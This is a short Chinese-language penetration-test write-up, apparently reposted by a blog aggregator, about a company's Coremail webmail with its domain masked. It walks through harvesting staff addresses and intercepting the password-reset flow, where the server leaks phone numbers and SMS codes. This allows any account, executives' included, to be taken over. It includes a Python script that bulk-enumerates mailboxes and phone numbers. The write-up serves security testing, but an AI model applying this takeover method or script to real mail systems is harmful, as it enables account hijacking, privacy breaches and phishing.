目前分析

?

1、地址：https://mail.*****com/coremail/

分析:

登錄功能和忘記密碼功能;

目前站點(diǎn)是郵箱系統(tǒng)。方向：爆破、邏輯漏洞-密碼找回

信息收集

1、google通過域名收集相關(guān)網(wǎng)站獲取郵箱信息，inur:***

2.經(jīng)過多個郵箱信息收集，發(fā)現(xiàn)郵箱命名規(guī)則

密碼找回

輸入獲取到的郵箱，點(diǎn)擊獲取郵箱的手機(jī)號碼，并進(jìn)行 抓放

返回綁定的手機(jī)號碼，信息泄露，如果失敗時返回錯誤的

在點(diǎn)擊 【獲取短信內(nèi)容】，發(fā)現(xiàn)有個**code的內(nèi)容，四位數(shù)，可能是驗(yàn)證碼，把這個驗(yàn)證碼輸入進(jìn)去，成功了。? ? [是它是它，就是它]

輸入驗(yàn)證碼，下一步成功了，說明是正確的，重置任意賬戶郵箱密碼

PYTHON可批量獲取手機(jī)號碼

1、收集當(dāng)前公司員工名字轉(zhuǎn)換成拼音

2、手機(jī)公布的郵箱信息

只是簡單寫一下獲取手機(jī)號碼 判斷郵箱用戶真實(shí)

import requests import json ''' 通過郵箱轉(zhuǎn)換批量獲取手機(jī)號碼和獲取正確的郵箱 '''headers={ 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Connection': 'close', 'Origin':'https://mail.******.com', 'Referer':'https://mail.******.com/coremail/changepwd.jsp?uid=', 'Host':'crm.******.com:80', 'Content-Length': '61' }def poststrfox():name='***name'mail=name+'@******.com'data = {'mail': mail,'lyPass': 'q76a5e96JIQwRMqTTtzWMA=='}url='https://crm.******.com:80/getPhone'req = requests.port(url=url,data=data,headers=headers)rtext = req.textdic_jsdict = json.loads(rtext) #返回的是json格式的，所以需要轉(zhuǎn)換一下message = dic_jsdict['message']print(message, '|', mail)poststrfox()

危害/修復(fù)：

1、可以爆破獲取用戶名

2、通過用戶可以獲取手機(jī)號碼，信息泄露

3、可以重置任意賬戶郵箱密碼，包括高管的郵箱手機(jī)號碼，獲取郵箱權(quán)限，可干的事情很多，釣魚等。

修復(fù)建議

升級當(dāng)前郵件系統(tǒng)

總結(jié)

以上是生活随笔為你收集整理的某公司邮件系统的安全检测的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。